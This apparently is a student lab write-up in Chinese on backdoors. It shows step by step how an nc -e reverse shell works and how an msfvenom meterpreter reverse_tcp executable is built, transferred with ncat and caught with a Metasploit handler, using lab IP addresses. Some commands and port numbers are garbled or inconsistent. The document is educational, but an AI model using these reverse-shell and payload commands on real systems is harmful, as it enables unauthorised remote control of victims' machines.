后门原理与实践

后门的定义

后门就是不经过正常认证流程而访问系统的通道。

哪里有后门呢?

1编译器留后门

2操作系统留后门

3最常见的当然还是应用程序中留后门
4还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。

实验准备

1、把虚拟机kali的网络改为桥接
2、修改windows控制台的编码方式
法一:在cmd中输入 CHCP 65001(临时转码,不可永久)
1249774-20180524221230927-730586752.png

法二:修改regedit注册表
详细操作见此地址:(百度的力量十分强大)https://blog.csdn.net/chy555chy/article/details/78355985
3、关掉防火墙与杀毒软件

一、实验内容

(一)Windows获得Linux Shell:

  1. 在Windows下,先使用ipconfig指令查看winXP(物理机)
    1249774-20180525110612352-582345775.png

  2. 使用ncat.exe程序监听本机的1120端口:
    1249774-20180525105502345-1566374633.png

3.Kali:使用nc指令的-e选项反向连接Windows主机的1120端口
1249774-20180525110827720-1291377400.png

4.Windows下成功获得了一个Kali的shell,运行ls指令如下
1249774-20180525110926471-1900512732.png

发生乱码,应提前修改编码方式UTF-8,此时先不改。

(二)使用MSF meterpreter生成可执行文件,利用ncat传送到主机并运行获取主机Shell输入指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.110 LPORT=1120 -f exe > 20179225_backdoor.exe生成后门程序,生成一个名称为20179225_backdoor.exe 后门可执行文件
1249774-20180525123044250-254324509.png

利用ncat或socat传送到主机
接下来需要将这个后门程序传到我们的靶机上,可以通过ncat来实现
在win的cmd下使用 ncat.exe -lv 1120 > 20179225_backdoor.exe 命令在443号端口进行监听
1249774-20180525130818265-1431836983.png

然后在Linux下使用 ncat -nv 192.168.1.104 443 < 20145328.encat -nv 192.168.1.109 1120 < 20179225_backdoor.exe命令把文件传送过去
1249774-20180525131325967-1372791057.png

不知为何,连接失败
现直接把文档拷贝过去
接下来

    首先msf打开监听进程

    msfconsole //进入msf
1249774-20180525142103303-1734678440.png

    use exploit/multi/handler//进入handler模式

    set payload windows/meterpreter/reverse_tcp//设置payload

    set LHOST 192.168.1.110//将LHOST设置为LinuxIP地址

    set LPORT 1120 //设端口为那个1120

1249774-20180525142629151-891526882.png

设置完成后,执行监听指令 exploit 。打开windows上的后门程序20151120_backdoor.exe
1249774-20180525144024527-1954341840.png

转载于:https://www.cnblogs.com/2017yaya/p/9085935.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值